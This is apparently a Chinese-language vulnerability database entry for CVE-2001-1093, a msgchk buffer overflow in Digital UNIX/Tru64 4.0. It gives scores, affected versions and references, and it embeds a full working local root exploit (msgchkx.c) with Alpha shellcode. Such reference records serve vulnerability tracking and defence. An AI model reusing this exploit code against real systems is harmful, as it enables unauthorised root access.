CVE-2001-1093
CVSS7.2
发布时间 :2001-09-10 00:00:00
修订时间 :2008-09-05 16:25:40
NMCOES    

[原文]Buffer overflow in msgchk in Digital UNIX 4.0G and earlier allows local users to execute arbitrary code via a long command line argument.


[CNNVD]Digital Unix MSGCHK缓冲区溢出漏洞(CNNVD-200109-024)

        Digital UNIX 4.0G及其早期版本的msgchk存在缓冲区溢出漏洞。本地用户借助超长命令行参数执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:compaq:tru64:4.0gCompaq Tru64 4.0g
cpe:/o:compaq:tru64:4.0eCompaq Tru64 4.0e
cpe:/o:compaq:tru64:4.0fCompaq Tru64 4.0f
cpe:/o:compaq:tru64:4.0dCompaq Tru64 4.0d

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1093
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1093
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200109-024
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/7101.php
(VENDOR_ADVISORY)  XF  du-msgchk-bo(7101)
http://www.securityfocus.com/bid/3311
(VENDOR_ADVISORY)  BID  3311
http://www.securityfocus.com/archive/1/213238
(VENDOR_ADVISORY)  BUGTRAQ  20010910 Digital Unix 4.0x msgchk multiple vulnerabilities

- 漏洞信息

Digital Unix MSGCHK缓冲区溢出漏洞
高危 缓冲区溢出
2001-09-10 00:00:00 2005-10-20 00:00:00
本地  
        Digital UNIX 4.0G及其早期版本的msgchk存在缓冲区溢出漏洞。本地用户借助超长命令行参数执行任意代码。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (21105)

Digital Unix 4.0 MSGCHK Buffer Overflow Vulnerability (EDBID:21105)
unix local
2001-09-05 Verified
0 seo
N/A [点击下载]
source: http://www.securityfocus.com/bid/3311/info

The msgchk utility under certain versions of Digital Unix contains a buffer overflow vulnerability which could yield root privilege.

If a local user invokes the msgchk utility at the command line, argumented with a sufficiently long string of bytes, a buffer overflow condition can be triggered. Where msgchk runs suid root, this can allow hostile code to be executed as root, granting an attacker administrative access to the vulnerable system. 

++ msgchkx.c

/*
 * 2001/09/05  - at the bench of windy fall
 * /usr/bin/mh/msgchk buffer overflow exploit code by truefinder ,
seo@igrus.inha.ac.kr
 * now we will drill /usr/bin/mh/msgchk
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOP             0x47ff041f
#define ALIGNSIZE       (4 + 1 )
#define BUFSIZE         (8000 + 211 )
#define RETADDR         0x000000011ffffaa0
#define DEFNOPSIZE      7168

char nop[] = { 0x1f, 0x04, 0xff, 0x47, 0x00 };
char retaddr[] = { 0xa0, 0xea, 0xff, 0x1f, 0x01 , 0x00 };

static char shellcode[] =
        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
        "\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */
        "\x12\x94\x07\x42"      /* addq $16,60,$18              */
        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
        "\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */
        "\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */
        "\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */
        "\xf9\xff\x1f\xd2"      /* bsr $16,-28                  */
        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
        "\x31\x15\xd8\x43"      /* subq $30,192,$17             */
        "\x12\x04\xff\x47"      /* clr $18                      */
        "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
        "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
        "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
        "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
        "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
        "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
        "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
        "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
        "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
        "\x13\x94\xe7\x43"      /* addq $31,60,$19              */
        "\x20\x35\x60\x42"      /* subq $19,1,$0                */
        "\xff\xff\xff\xff";     /* callsys ( disguised )        */
        /* oh! this is ohhara's shellcode */

int
main(int argc, char  *argv[] )
{

        char *buf , *buf_ptr;
        int bufsize , alignsize , offset ;
        int i, totalsize;

        bufsize = BUFSIZE ; alignsize = ALIGNSIZE ; offset = 0 ;

        if ( argc < 1 ) {
                printf("usage : %s <bufsize> <align> <offset>\n",
argv[0]);
                exit (-1);
        }

        if (argc > 1 )
                bufsize = atoi( argv[1] );

        if ( argc > 2 )
                alignsize = atoi( argv[2] ) + ALIGNSIZE ;

        if ( argc > 3 )
                offset = atoi ( argv[3] );

        totalsize = alignsize + bufsize ;
         buf = malloc( totalsize ) ;


        memset ( buf, NULL , totalsize );

        memset ( buf, 'A', alignsize );
        buf_ptr = (char *)(buf + alignsize );

        /* default nop size is 4096 bytes */
        for ( i = 0 ; i < DEFNOPSIZE/4 ; i++ )
                strcat ( buf_ptr , nop );

        strcat ( buf_ptr, shellcode );

        /* fill the block with 'A' */
        for ( i =0 ; i < bufsize - DEFNOPSIZE - strlen(shellcode) - 8 ;
i++ )
                strcat( buf_ptr ,"A");

        strcat ( buf_ptr , retaddr );

        execl ("/var/tmp/mh/msgchk", "msgchk", buf, NULL );
}
		

- 漏洞信息

8767
Digital Unix msgchk Command Line Argument Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-09-10 Unknow
2001-09-10 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Digital Unix MSGCHK Buffer Overflow Vulnerability
Boundary Condition Error 3311
No Yes
2001-09-10 12:00:00 2009-07-11 07:56:00
This vulnerability was announced via the Bugtraq mailing list by Seunghyun Seo <seo@igrus.inha.ac.kr> on September 10, 2001.

- 受影响的程序版本

Digital (Compaq) TRU64/DIGITAL UNIX 4.0 g
Digital (Compaq) TRU64/DIGITAL UNIX 4.0 f
Digital (Compaq) TRU64/DIGITAL UNIX 4.0 e
Digital (Compaq) TRU64/DIGITAL UNIX 4.0 d

- 漏洞讨论

The msgchk utility under certain versions of Digital Unix contains a buffer overflow vulnerability which could yield root privilege.

If a local user invokes the msgchk utility at the command line, argumented with a sufficiently long string of bytes, a buffer overflow condition can be triggered. Where msgchk runs suid root, this can allow hostile code to be executed as root, granting an attacker administrative access to the vulnerable system.

- 漏洞利用

msgchkx.c courtesy Seunghyun Seo &lt;seo@igrus.inha.ac.kr&gt;

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站